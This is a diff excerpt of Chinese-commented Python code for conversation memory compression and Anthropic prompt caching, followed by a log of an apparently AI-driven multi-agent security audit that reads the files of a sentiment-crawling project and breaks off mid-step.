r'\.py|\.js|\.ts|\.java|\.go|\.php',
|
||||
]
|
||||
for pattern in file_patterns[:3]:
|
||||
matches = re.findall(pattern, text)
|
||||
for match in matches:
|
||||
if match not in key_info["files_analyzed"]:
|
||||
key_info["files_analyzed"].append(match)
|
||||
|
||||
# 提取决策
|
||||
if any(kw in text for kw in ["决定", "决策", "decision", "选择", "采用"]):
|
||||
# 尝试提取决策内容
|
||||
decision_match = re.search(r'(决定|决策|decision)[::\s]*([^\n。.]{10,50})', text)
|
||||
if decision_match:
|
||||
key_info["decisions"].append(decision_match.group(2)[:50])
|
||||
else:
|
||||
key_info["decisions"].append("做出决策")
|
||||
|
||||
# 提取错误
|
||||
if any(kw in text for kw in ["错误", "失败", "error", "failed", "exception"]):
|
||||
error_match = re.search(r'(错误|error|failed)[::\s]*([^\n]{10,50})', text, re.IGNORECASE)
|
||||
if error_match:
|
||||
key_info["errors"].append(error_match.group(2)[:50])
|
||||
else:
|
||||
key_info["errors"].append("遇到错误")
|
||||
|
||||
# 去重并限制数量
|
||||
for key in key_info:
|
||||
key_info[key] = list(set(key_info[key]))[:5]
|
||||
|
||||
return key_info
|
||||
|
||||
def should_compress(self, messages: List[Dict[str, Any]]) -> bool:
|
||||
"""
|
||||
检查是否需要压缩
|
||||
|
||||
Args:
|
||||
messages: 消息列表
|
||||
|
||||
Returns:
|
||||
是否需要压缩
|
||||
"""
|
||||
total_tokens = sum(get_message_tokens(msg) for msg in messages)
|
||||
return total_tokens > self.max_total_tokens * COMPRESSION_THRESHOLD
|
||||
|
||||
|
||||
# 便捷函数
|
||||
def compress_conversation(
|
||||
messages: List[Dict[str, Any]],
|
||||
max_tokens: int = MAX_TOTAL_TOKENS,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
压缩对话历史的便捷函数
|
||||
|
||||
Args:
|
||||
messages: 消息列表
|
||||
max_tokens: 最大token数
|
||||
|
||||
Returns:
|
||||
压缩后的消息列表
|
||||
"""
|
||||
compressor = MemoryCompressor(max_total_tokens=max_tokens)
|
||||
return compressor.compress_history(messages)
|
||||
|
|
@ -0,0 +1,333 @@
|
|||
"""
|
||||
Prompt Caching 模块
|
||||
|
||||
为支持缓存的 LLM(如 Anthropic Claude)提供 Prompt 缓存功能。
|
||||
通过在系统提示词和早期对话中添加缓存标记,减少重复处理,
|
||||
显著降低 Token 消耗和响应延迟。
|
||||
|
||||
支持的 LLM:
|
||||
- Anthropic Claude (claude-3-5-sonnet, claude-3-opus, claude-3-haiku)
|
||||
- OpenAI (部分模型支持)
|
||||
|
||||
缓存策略:
|
||||
- 短对话(<10轮): 仅缓存系统提示词
|
||||
- 中等对话(10-30轮): 缓存系统提示词 + 前5轮对话
|
||||
- 长对话(>30轮): 多个缓存点,动态调整
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Dict, Any, List, Optional, Tuple
|
||||
from dataclasses import dataclass, field
|
||||
from enum import Enum
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CacheStrategy(str, Enum):
|
||||
"""缓存策略"""
|
||||
NONE = "none" # 不缓存
|
||||
SYSTEM_ONLY = "system_only" # 仅缓存系统提示词
|
||||
SYSTEM_AND_EARLY = "system_early" # 缓存系统提示词和早期对话
|
||||
MULTI_POINT = "multi_point" # 多缓存点
|
||||
|
||||
|
||||
@dataclass
|
||||
class CacheConfig:
|
||||
"""缓存配置"""
|
||||
enabled: bool = True
|
||||
strategy: CacheStrategy = CacheStrategy.SYSTEM_AND_EARLY
|
||||
|
||||
# 缓存阈值
|
||||
min_system_prompt_tokens: int = 1000 # 系统提示词最小 token 数才启用缓存
|
||||
early_messages_count: int = 5 # 早期对话缓存的消息数
|
||||
|
||||
# 多缓存点配置
|
||||
multi_point_interval: int = 10 # 多缓存点间隔(消息数)
|
||||
max_cache_points: int = 4 # 最大缓存点数量
|
||||
|
||||
|
||||
@dataclass
|
||||
class CacheStats:
|
||||
"""缓存统计"""
|
||||
cache_hits: int = 0
|
||||
cache_misses: int = 0
|
||||
cached_tokens: int = 0
|
||||
total_tokens: int = 0
|
||||
|
||||
@property
|
||||
def hit_rate(self) -> float:
|
||||
total = self.cache_hits + self.cache_misses
|
||||
return self.cache_hits / total if total > 0 else 0.0
|
||||
|
||||
@property
|
||||
def token_savings(self) -> float:
|
||||
return self.cached_tokens / self.total_tokens if self.total_tokens > 0 else 0.0
|
||||
|
||||
|
||||
class PromptCacheManager:
|
||||
"""
|
||||
Prompt 缓存管理器
|
||||
|
||||
负责:
|
||||
1. 检测 LLM 是否支持缓存
|
||||
2. 根据对话长度选择缓存策略
|
||||
3. 为消息添加缓存标记
|
||||
4. 统计缓存效果
|
||||
"""
|
||||
|
||||
# 支持缓存的模型
|
||||
CACHEABLE_MODELS = {
|
||||
# Anthropic Claude
|
||||
"claude-3-5-sonnet": True,
|
||||
"claude-3-5-sonnet-20241022": True,
|
||||
"claude-3-opus": True,
|
||||
"claude-3-opus-20240229": True,
|
||||
"claude-3-haiku": True,
|
||||
"claude-3-haiku-20240307": True,
|
||||
"claude-3-sonnet": True,
|
||||
"claude-3-sonnet-20240229": True,
|
||||
# OpenAI (部分支持)
|
||||
"gpt-4-turbo": False, # 暂不支持
|
||||
"gpt-4o": False,
|
||||
"gpt-4o-mini": False,
|
||||
}
|
||||
|
||||
# Anthropic 缓存标记
|
||||
ANTHROPIC_CACHE_CONTROL = {"type": "ephemeral"}
|
||||
|
||||
def __init__(self, config: Optional[CacheConfig] = None):
|
||||
self.config = config or CacheConfig()
|
||||
self.stats = CacheStats()
|
||||
self._cache_enabled_for_session = True
|
||||
|
||||
def supports_caching(self, model: str, provider: str) -> bool:
|
||||
"""
|
||||
检查模型是否支持缓存
|
||||
|
||||
Args:
|
||||
model: 模型名称
|
||||
provider: 提供商名称
|
||||
|
||||
Returns:
|
||||
是否支持缓存
|
||||
"""
|
||||
if not self.config.enabled:
|
||||
return False
|
||||
|
||||
# Anthropic Claude 支持缓存
|
||||
if provider.lower() in ["anthropic", "claude"]:
|
||||
# 检查模型名称
|
||||
for cacheable_model in self.CACHEABLE_MODELS:
|
||||
if cacheable_model in model.lower():
|
||||
return self.CACHEABLE_MODELS.get(cacheable_model, False)
|
||||
|
||||
return False
|
||||
|
||||
def determine_strategy(
|
||||
self,
|
||||
messages: List[Dict[str, Any]],
|
||||
system_prompt_tokens: int = 0,
|
||||
) -> CacheStrategy:
|
||||
"""
|
||||
根据对话状态确定缓存策略
|
||||
|
||||
Args:
|
||||
messages: 消息列表
|
||||
system_prompt_tokens: 系统提示词的 token 数
|
||||
|
||||
Returns:
|
||||
缓存策略
|
||||
"""
|
||||
if not self.config.enabled:
|
||||
return CacheStrategy.NONE
|
||||
|
||||
# 系统提示词太短,不值得缓存
|
||||
if system_prompt_tokens < self.config.min_system_prompt_tokens:
|
||||
return CacheStrategy.NONE
|
||||
|
||||
message_count = len(messages)
|
||||
|
||||
# 短对话:仅缓存系统提示词
|
||||
if message_count < 10:
|
||||
return CacheStrategy.SYSTEM_ONLY
|
||||
|
||||
# 中等对话:缓存系统提示词和早期对话
|
||||
if message_count < 30:
|
||||
return CacheStrategy.SYSTEM_AND_EARLY
|
||||
|
||||
# 长对话:多缓存点
|
||||
return CacheStrategy.MULTI_POINT
|
||||
|
||||
def add_cache_markers_anthropic(
|
||||
self,
|
||||
messages: List[Dict[str, Any]],
|
||||
strategy: CacheStrategy,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
为 Anthropic Claude 消息添加缓存标记
|
||||
|
||||
Anthropic 的缓存格式:
|
||||
- 在 content 中使用 cache_control 字段
|
||||
- 支持 text 类型的 content block
|
||||
|
||||
Args:
|
||||
messages: 原始消息列表
|
||||
strategy: 缓存策略
|
||||
|
||||
Returns:
|
||||
添加了缓存标记的消息列表
|
||||
"""
|
||||
if strategy == CacheStrategy.NONE:
|
||||
return messages
|
||||
|
||||
cached_messages = []
|
||||
|
||||
for i, msg in enumerate(messages):
|
||||
new_msg = msg.copy()
|
||||
|
||||
# 系统提示词缓存
|
||||
if msg.get("role") == "system":
|
||||
new_msg = self._add_cache_to_message(new_msg)
|
||||
cached_messages.append(new_msg)
|
||||
continue
|
||||
|
||||
# 早期对话缓存
|
||||
if strategy in [CacheStrategy.SYSTEM_AND_EARLY, CacheStrategy.MULTI_POINT]:
|
||||
if i <= self.config.early_messages_count:
|
||||
new_msg = self._add_cache_to_message(new_msg)
|
||||
|
||||
# 多缓存点
|
||||
if strategy == CacheStrategy.MULTI_POINT:
|
||||
if i > 0 and i % self.config.multi_point_interval == 0:
|
||||
cache_point_count = i // self.config.multi_point_interval
|
||||
if cache_point_count <= self.config.max_cache_points:
|
||||
new_msg = self._add_cache_to_message(new_msg)
|
||||
|
||||
cached_messages.append(new_msg)
|
||||
|
||||
return cached_messages
|
||||
|
||||
def _add_cache_to_message(self, msg: Dict[str, Any]) -> Dict[str, Any]:
|
||||
"""
|
||||
为单条消息添加缓存标记
|
||||
|
||||
Args:
|
||||
msg: 原始消息
|
||||
|
||||
Returns:
|
||||
添加了缓存标记的消息
|
||||
"""
|
||||
content = msg.get("content", "")
|
||||
|
||||
# 如果 content 是字符串,转换为 content block 格式
|
||||
if isinstance(content, str):
|
||||
msg["content"] = [
|
||||
{
|
||||
"type": "text",
|
||||
"text": content,
|
||||
"cache_control": self.ANTHROPIC_CACHE_CONTROL,
|
||||
}
|
||||
]
|
||||
elif isinstance(content, list):
|
||||
# 已经是 content block 格式,为最后一个 block 添加缓存
|
||||
if content:
|
||||
last_block = content[-1]
|
||||
if isinstance(last_block, dict):
|
||||
last_block["cache_control"] = self.ANTHROPIC_CACHE_CONTROL
|
||||
|
||||
return msg
|
||||
|
||||
def process_messages(
|
||||
self,
|
||||
messages: List[Dict[str, Any]],
|
||||
model: str,
|
||||
provider: str,
|
||||
system_prompt_tokens: int = 0,
|
||||
) -> Tuple[List[Dict[str, Any]], bool]:
|
||||
"""
|
||||
处理消息,添加缓存标记
|
||||
|
||||
Args:
|
||||
messages: 原始消息列表
|
||||
model: 模型名称
|
||||
provider: 提供商名称
|
||||
system_prompt_tokens: 系统提示词 token 数
|
||||
|
||||
Returns:
|
||||
(处理后的消息列表, 是否启用了缓存)
|
||||
"""
|
||||
if not self.supports_caching(model, provider):
|
||||
return messages, False
|
||||
|
||||
strategy = self.determine_strategy(messages, system_prompt_tokens)
|
||||
|
||||
if strategy == CacheStrategy.NONE:
|
||||
return messages, False
|
||||
|
||||
# 根据提供商选择缓存方法
|
||||
if provider.lower() in ["anthropic", "claude"]:
|
||||
cached_messages = self.add_cache_markers_anthropic(messages, strategy)
|
||||
logger.debug(f"Applied {strategy.value} caching strategy for Anthropic")
|
||||
return cached_messages, True
|
||||
|
||||
return messages, False
|
||||
|
||||
def update_stats(
|
||||
self,
|
||||
cache_creation_input_tokens: int = 0,
|
||||
cache_read_input_tokens: int = 0,
|
||||
total_input_tokens: int = 0,
|
||||
):
|
||||
"""
|
||||
更新缓存统计
|
||||
|
||||
Args:
|
||||
cache_creation_input_tokens: 缓存创建的 token 数
|
||||
cache_read_input_tokens: 缓存读取的 token 数
|
||||
total_input_tokens: 总输入 token 数
|
||||
"""
|
||||
if cache_read_input_tokens > 0:
|
||||
self.stats.cache_hits += 1
|
||||
self.stats.cached_tokens += cache_read_input_tokens
|
||||
else:
|
||||
self.stats.cache_misses += 1
|
||||
|
||||
self.stats.total_tokens += total_input_tokens
|
||||
|
||||
def get_stats_summary(self) -> Dict[str, Any]:
|
||||
"""获取缓存统计摘要"""
|
||||
return {
|
||||
"cache_hits": self.stats.cache_hits,
|
||||
"cache_misses": self.stats.cache_misses,
|
||||
"hit_rate": f"{self.stats.hit_rate:.2%}",
|
||||
"cached_tokens": self.stats.cached_tokens,
|
||||
"total_tokens": self.stats.total_tokens,
|
||||
"token_savings": f"{self.stats.token_savings:.2%}",
|
||||
}
|
||||
|
||||
|
||||
# 全局缓存管理器实例
|
||||
prompt_cache_manager = PromptCacheManager()
|
||||
|
||||
|
||||
def estimate_tokens(text: str) -> int:
|
||||
"""
|
||||
估算文本的 token 数量
|
||||
|
||||
简单估算:英文约 4 字符/token,中文约 2 字符/token
|
||||
|
||||
Args:
|
||||
text: 文本内容
|
||||
|
||||
Returns:
|
||||
估算的 token 数
|
||||
"""
|
||||
if not text:
|
||||
return 0
|
||||
|
||||
# 统计中文字符
|
||||
chinese_chars = sum(1 for c in text if '\u4e00' <= c <= '\u9fff')
|
||||
other_chars = len(text) - chinese_chars
|
||||
|
||||
# 中文约 2 字符/token,其他约 4 字符/token
|
||||
return int(chinese_chars / 2 + other_chars / 4)
|
||||
Binary file not shown.
|
|
@ -0,0 +1,809 @@
|
|||
14:22:48
|
||||
🔗 Connected to audit stream
|
||||
14:23:04
|
||||
Orchestrator
|
||||
Thought: 我需要对这个复杂的多组件项目进行安全审计。项目包含多个引擎(MediaEngine, MindSpider, QueryEngine, ReportEngine, InsightEngine, ForumEngine)和相关的 Streamlit 报告应用,使用 Python 和 JavaScript 开发。首先,我需要全面了解项目的结构、技术栈和入口点,以便确定审计的重点区域。我将从 recon Agent 开始,收集项目的基本信息。
|
||||
14:23:08
|
||||
📤 调度 recon Agent: 分析项目结构、技术栈、入口点和主要组件...
|
||||
Orchestrator
|
||||
14:23:18
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和文件组织。这将帮助我识别项目的基本架构和组件。我将从根目录开始,使用list_files工具查看项目结构。
|
||||
14:23:22
|
||||
Completed: list_files
|
||||
Recon
|
||||
4ms
|
||||
14:23:26
|
||||
Recon
|
||||
Thought: 从项目结构来看,这是一个包含多个组件的复杂项目,主要包括:
|
||||
1. MediaEngine - 一个Python模块,似乎处理媒体相关功能
|
||||
2. MindSpider - 包含爬虫功能,特别是DeepSentimentCrawling
|
||||
3. 根目录有一些Python应用文件,如app.py、config.py等
|
||||
4. 有Docker相关文件,表明这是一个容器化项目
|
||||
|
||||
我需要进一步了解技术栈和项目配置。首先,我应该查看根目录的配置文件,如requirements.txt、config.py和app.py,以了解主要的技术栈和入口点。
|
||||
14:23:34
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
Input:
|
||||
{
|
||||
"file_path": "requirements.txt"
|
||||
}
|
||||
|
||||
Output:
|
||||
null
|
||||
14:23:35
|
||||
Recon
|
||||
Thought: 从requirements.txt可以看出这是一个复杂的项目,使用了多种技术栈:
|
||||
1. Web框架:Flask、Streamlit、FastAPI
|
||||
2. 实时通信:Flask-SocketIO、python-socketio
|
||||
3. 数据库:MySQL、PostgreSQL、SQLite、Redis
|
||||
4. 爬虫工具:Playwright、BeautifulSoup等
|
||||
5. 机器学习:PyTorch、Transformers等
|
||||
6. 其他工具:OpenAI API、Tavily搜索等
|
||||
|
||||
现在我需要查看主要的入口点文件,如app.py,了解应用程序的主要结构和功能。
|
||||
14:23:38
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:23:39
|
||||
Recon
|
||||
Thought: 从app.py文件的前500行可以看出,这是一个Flask应用,用于统一管理三个Streamlit应用。它包含以下关键信息:
|
||||
|
||||
1. 使用Flask作为主框架,Flask-SocketIO用于实时通信
|
||||
2. 配置了多个API密钥和引擎(Insight Engine、Media Engine、Query Engine等)
|
||||
3. 使用MindSpider模块进行爬虫功能
|
||||
4. 尝试导入ReportEngine作为蓝图
|
||||
5. 配置了多个数据库连接参数
|
||||
|
||||
我需要继续查看app.py的其余部分,以了解完整的应用结构和入口点。同时,我也应该查看config.py文件来了解配置结构。
|
||||
14:23:44
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:23:44
|
||||
Recon
|
||||
Thought: 从app.py的501-1000行可以看出,这个应用管理多个Streamlit子进程:
|
||||
|
||||
1. 有四个主要进程:insight、media、query和forum
|
||||
2. 每个进程都有独立的端口(insight: 8501, media: 8502, query: 8503)
|
||||
3. 使用队列进行进程间通信
|
||||
4. 有日志记录功能,将输出写入文件并通过WebSocket发送到前端
|
||||
5. 有启动Streamlit应用的函数
|
||||
|
||||
我需要继续查看app.py的剩余部分,以了解完整的API路由和功能。同时,我也应该查看config.py文件来了解配置结构。
|
||||
14:23:48
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:23:49
|
||||
Recon
|
||||
Thought: 从app.py的最后部分可以看出,这个应用提供了多个API端点:
|
||||
|
||||
1. 日志相关API:读取和测试日志
|
||||
2. ForumEngine相关API:启动/停止论坛监控,获取论坛日志
|
||||
3. 搜索API:统一搜索接口,可以向运行中的不同引擎发送搜索请求
|
||||
4. 每个Streamlit应用都有对应的API端口(insight: 8601, media: 8602, query: 8603)
|
||||
|
||||
现在我需要查看config.py文件来了解配置结构,以及查看SingleEngineApp目录来了解各个引擎的实现。
|
||||
14:23:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:23:56
|
||||
Recon
|
||||
Thought: 从config.py文件可以看出,这是一个使用Pydantic Settings进行配置管理的项目,包含多个API密钥和配置项:
|
||||
|
||||
1. 数据库配置:支持MySQL和PostgreSQL
|
||||
2. 多个LLM引擎配置:Insight Engine、Media Engine、Query Engine、Report Engine等
|
||||
3. 网络工具配置:Tavily API、Bocha API等
|
||||
4. 每个引擎都有对应的API密钥、基础URL和模型名称
|
||||
|
||||
现在我需要查看SingleEngineApp目录,了解各个引擎的实现,以及查看MindSpider目录,了解爬虫功能的实现。
|
||||
14:24:02
|
||||
Completed: list_files
|
||||
Recon
|
||||
0ms
|
||||
14:24:03
|
||||
Recon
|
||||
Thought: SingleEngineApp目录包含三个Streamlit应用文件,分别对应三个不同的引擎:
|
||||
1. insight_engine_streamlit_app.py - 洞察引擎
|
||||
2. media_engine_streamlit_app.py - 媒体引擎
|
||||
3. query_engine_streamlit_app.py - 查询引擎
|
||||
|
||||
我需要查看这些文件来了解各个引擎的具体实现和功能。首先查看洞察引擎的实现。
|
||||
14:24:07
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:24:07
|
||||
Recon
|
||||
Thought: 从insight_engine_streamlit_app.py可以看出,这是一个Streamlit应用,为Insight Agent提供Web界面。主要功能包括:
|
||||
|
||||
1. 接收URL参数中的查询内容
|
||||
2. 使用DeepSearchAgent执行深度搜索和分析
|
||||
3. 生成报告结构并处理段落
|
||||
4. 执行反思循环以改进分析结果
|
||||
5. 生成最终报告
|
||||
|
||||
现在我需要查看媒体引擎和查询引擎的实现,以及MindSpider目录,了解爬虫功能的实现。
|
||||
14:24:12
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:26:02
|
||||
Recon
|
||||
Thought: 从media_engine_streamlit_app.py可以看出,这是Media Agent的Streamlit界面,主要功能包括:
|
||||
|
||||
1. 支持多模态能力,可以处理视频、图文、直播等内容
|
||||
2. 支持多种搜索引擎:BochaAPI和AnspireAPI
|
||||
3. 使用Gemini模型作为默认LLM
|
||||
4. 接收URL参数中的查询内容并自动执行搜索
|
||||
|
||||
现在我需要查看查询引擎的实现,以及MindSpider目录,了解爬虫功能的实现。
|
||||
14:26:07
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:26:10
|
||||
Recon
|
||||
Thought: 从query_engine_streamlit_app.py可以看出,这是Query Agent的Streamlit界面,主要功能包括:
|
||||
|
||||
1. 具备强大的网页搜索能力
|
||||
2. 注重国内外资源相结合理解舆情
|
||||
3. 使用DeepSeek模型作为默认LLM
|
||||
4. 使用Tavily API进行网络搜索
|
||||
5. 与Insight Agent类似,也执行报告结构生成、段落处理和反思循环
|
||||
|
||||
现在我需要查看MindSpider目录,了解爬虫功能的实现。
|
||||
14:26:14
|
||||
Completed: list_files
|
||||
Recon
|
||||
2ms
|
||||
14:26:14
|
||||
Recon
|
||||
Thought: MindSpider目录包含一个复杂的爬虫系统,主要结构包括:
|
||||
|
||||
1. DeepSentimentCrawling/MediaCrawler - 媒体爬虫模块
|
||||
- 包含缓存系统
|
||||
- 数据库模块
|
||||
- 代理系统
|
||||
- 各种工具函数
|
||||
- 主程序入口
|
||||
|
||||
2. DeepSentimentCrawling - 深度情感爬虫
|
||||
- 关键词管理器
|
||||
- 平台爬虫
|
||||
- 主程序
|
||||
|
||||
3. 根目录的MindSpider文件
|
||||
- 配置文件
|
||||
- 主程序
|
||||
|
||||
我需要查看MindSpider的主程序和配置文件,了解爬虫系统的整体架构和功能。
|
||||
14:26:18
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:26:20
|
||||
Recon
|
||||
Thought: 从MindSpider/main.py可以看出,这是一个AI爬虫项目的主程序,集成了两个核心模块:
|
||||
|
||||
1. BroadTopicExtraction - 广泛主题提取
|
||||
2. DeepSentimentCrawling - 深度情感爬虫
|
||||
|
||||
主要功能包括:
|
||||
- 检查配置和数据库连接
|
||||
- 初始化数据库
|
||||
- 运行爬虫任务
|
||||
- 支持多种数据库(MySQL、PostgreSQL)
|
||||
|
||||
现在我需要查看MindSpider的配置文件,了解具体的配置项。
|
||||
14:26:24
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:26:25
|
||||
Recon
|
||||
Thought: 从MindSpider/config.py可以看出,这是一个使用Pydantic Settings进行配置管理的模块,主要包含:
|
||||
|
||||
1. 数据库配置:支持MySQL和PostgreSQL
|
||||
2. MindSpider API配置:包括API密钥、基础URL和模型名称
|
||||
3. 使用.env文件进行环境变量管理
|
||||
|
||||
现在我需要查看DeepSentimentCrawling模块,了解爬虫的具体实现。
|
||||
14:26:29
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:27:09
|
||||
Recon
|
||||
Thought: 从DeepSentimentCrawling/main.py可以看出,这是一个深度情感爬取模块,主要功能包括:
|
||||
|
||||
1. 支持多个平台:小红书(xhs)、抖音(dy)、快手(ks)、哔哩哔哩(bili)、微博(wb)、贴吧(tieba)、知乎(zhihu)
|
||||
2. 基于关键词进行爬取
|
||||
3. 支持每日爬取任务和单个平台爬取
|
||||
4. 使用关键词管理器(KeywordManager)和平台爬虫(PlatformCrawler)
|
||||
|
||||
现在我需要查看平台爬虫的实现,了解具体的爬取逻辑。
|
||||
14:27:19
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
14:27:19
|
||||
✅ recon Agent 完成
|
||||
Orchestrator
|
||||
14:27:39
|
||||
Orchestrator
|
||||
Thought: Recon Agent 的执行结果没有返回任何有用的信息,项目结构、技术栈、入口点等都是空的。这可能是因为 Agent 需要更具体的指导。我将尝试一个更具体的 recon 任务,重点关注配置文件和主要代码文件,因为这些通常包含安全敏感信息。
|
||||
14:27:43
|
||||
📤 调度 recon Agent: 重点分析配置文件(config.py, .env.example)、主要入口文件(app.py, report_engine_only.py)和依赖文件(requirements.txt)...
|
||||
Orchestrator
|
||||
14:28:44
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和文件组织。这将帮助我识别项目类型、技术栈和关键组件。我将从根目录开始,递归列出所有文件和目录。
|
||||
14:28:51
|
||||
Completed: list_files
|
||||
Recon
|
||||
4ms
|
||||
14:28:51
|
||||
Recon
|
||||
Thought: 从文件列表中,我可以看到这是一个复杂的项目,包含多个组件:
|
||||
1. MediaEngine - 一个Python模块,似乎用于媒体处理和报告生成
|
||||
2. MindSpider/DeepSentimentCrawling - 一个网络爬虫项目,用于情感分析爬取
|
||||
3. 根目录有一些配置文件和主程序
|
||||
|
||||
我需要进一步了解项目的技术栈和依赖关系。首先,我应该查看根目录的配置文件,如requirements.txt、package.json等,以了解项目使用的依赖和技术栈。
|
||||
14:28:56
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:05
|
||||
Recon
|
||||
Thought: 从requirements.txt文件中,我可以看到这是一个复杂的项目,使用了多种技术栈:
|
||||
|
||||
1. Web框架:Flask、Streamlit、FastAPI
|
||||
2. 数据库:MySQL (pymysql, aiomysql)、SQLite (aiosqlite)、Redis、PostgreSQL (asyncpg)
|
||||
3. 爬虫工具:Playwright、BeautifulSoup、lxml等
|
||||
4. 机器学习:PyTorch、Transformers、scikit-learn等
|
||||
5. 其他工具:OpenAI API、数据处理、可视化等
|
||||
|
||||
现在我应该查看MindSpider/DeepSentimentCrawling目录下的package.json文件,以了解前端或Node.js相关的依赖。
|
||||
14:29:28
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:29:29
|
||||
Recon
|
||||
Thought: package.json文件显示这是一个使用VitePress的文档项目,没有前端应用依赖。现在我应该查看MindSpider/DeepSentimentCrawler目录下的requirements.txt文件,以了解爬虫组件的具体依赖。
|
||||
14:29:32
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:32
|
||||
Recon
|
||||
Thought: 现在我已经了解了项目的主要依赖。接下来,我应该查看主要的入口点文件,如app.py、main.py等,以了解应用程序的启动点和主要功能。首先查看根目录的app.py文件。
|
||||
14:29:35
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:29:35
|
||||
Recon
|
||||
Thought: app.py文件很长,我需要查看更多内容来了解应用程序的主要功能和入口点。让我继续读取文件的剩余部分。
|
||||
14:29:38
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:29:39
|
||||
Recon
|
||||
Thought: app.py文件非常长,我需要继续查看剩余部分以了解完整的应用程序结构。让我继续读取文件的最后部分。
|
||||
14:29:41
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:42
|
||||
Recon
|
||||
Thought: app.py文件很长,我已经看到了大部分内容,但还需要查看最后部分以了解完整的应用程序结构。让我继续读取文件的最后部分。
|
||||
14:29:43
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:46
|
||||
Recon
|
||||
Thought: 现在我已经了解了app.py文件的主要内容。这是一个Flask应用,用于管理多个Streamlit应用。接下来,我应该查看MindSpider/main.py文件,以了解爬虫组件的主要功能。
|
||||
14:29:51
|
||||
Completed: read_file
|
||||
Recon
|
||||
4ms
|
||||
14:29:53
|
||||
Recon
|
||||
Thought: MindSpider/main.py文件也很长,我需要查看更多内容来了解爬虫组件的主要功能。让我继续读取文件的剩余部分。
|
||||
14:29:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:29:56
|
||||
Recon
|
||||
Thought: 我已经了解了MindSpider/main.py文件的主要内容。这是一个爬虫项目的主程序,集成了BroadTopicExtraction和DeepSentimentCrawling两个核心模块。接下来,我应该查看配置文件,以了解项目的配置结构和敏感信息。
|
||||
14:29:59
|
||||
Completed: read_file
|
||||
Recon
|
||||
6ms
|
||||
Input:
|
||||
{
|
||||
"file_path": "config.py"
|
||||
}
|
||||
|
||||
Output:
|
||||
null
|
||||
14:30:03
|
||||
Recon
|
||||
Thought: config.py文件很长,我需要查看更多内容以了解完整的配置结构。让我继续读取文件的剩余部分。
|
||||
14:30:04
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:30:05
|
||||
Recon
|
||||
Thought: 现在我已经了解了config.py文件的主要内容。这是一个使用pydantic-settings管理的全局配置文件,包含了数据库配置、LLM API配置、网络工具配置等。接下来,我应该查看.env.example文件,以了解环境变量的配置示例。
|
||||
14:30:09
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:30:10
|
||||
Recon
|
||||
Thought: 现在我已经了解了项目的主要配置文件。接下来,我应该查看一些关键的入口点文件,如SingleEngineApp目录下的文件,以了解各个引擎的应用程序结构。首先查看SingleEngineApp目录结构。
|
||||
14:30:13
|
||||
Completed: list_files
|
||||
Recon
|
||||
1ms
|
||||
14:30:14
|
||||
Recon
|
||||
Thought: SingleEngineApp目录包含三个Streamlit应用程序文件。我应该查看其中一个文件以了解应用程序的结构和功能。让我先查看insight_engine_streamlit_app.py文件。
|
||||
14:30:17
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:30:17
|
||||
✅ recon Agent 完成
|
||||
Orchestrator
|
||||
14:30:17
|
||||
Orchestrator
|
||||
尝试直接分析项目中的关键文件,看看能否获取更多信息。我将尝试使用 analysis Agent 来分析项目中的主要文件,特别是配置文件和入口文件。
|
||||
14:30:20
|
||||
📤 调度 analysis Agent: 分析项目中的关键文件,包括config.py, app.py, report_engine_only.py等主要入口文件...
|
||||
Orchestrator
|
||||
14:30:26
|
||||
Analysis
|
||||
Thought: 我需要首先了解这个项目的结构和内容,以便制定合适的分析策略。由于项目信息有限,我不知道项目的具体语言和框架,所以我应该先探索项目结构,然后根据文件类型选择合适的分析工具。
|
||||
14:30:28
|
||||
Completed: list_files
|
||||
Analysis
|
||||
2ms
|
||||
14:30:50
|
||||
Analysis
|
||||
Thought: 从项目结构来看,这是一个Python项目,主要包含两个主要部分:MediaEngine和MindSpider。项目中有多个Python文件,包括配置文件、主程序文件和工具文件。我注意到有一些敏感文件如.env.example,可能包含配置信息。接下来我应该先查看主要的入口文件和配置文件,了解项目的基本功能,然后进行安全分析。
|
||||
14:30:57
|
||||
Completed: read_file
|
||||
Analysis
|
||||
4ms
|
||||
14:30:58
|
||||
Analysis
|
||||
Thought: 我已经看到了app.py文件的部分内容,这是一个Flask应用,用于管理三个Streamlit应用。我注意到一些安全相关信息:
|
||||
1. Flask应用的SECRET_KEY是硬编码的
|
||||
2. 有多个API密钥配置
|
||||
3. 使用了subprocess模块
|
||||
4. 有socketio通信
|
||||
|
||||
我需要继续查看app.py的其余部分,然后检查配置文件和其他关键文件。让我先读取app.py的剩余部分。
|
||||
14:31:02
|
||||
Completed: read_file
|
||||
Analysis
|
||||
2ms
|
||||
14:31:02
|
||||
Analysis
|
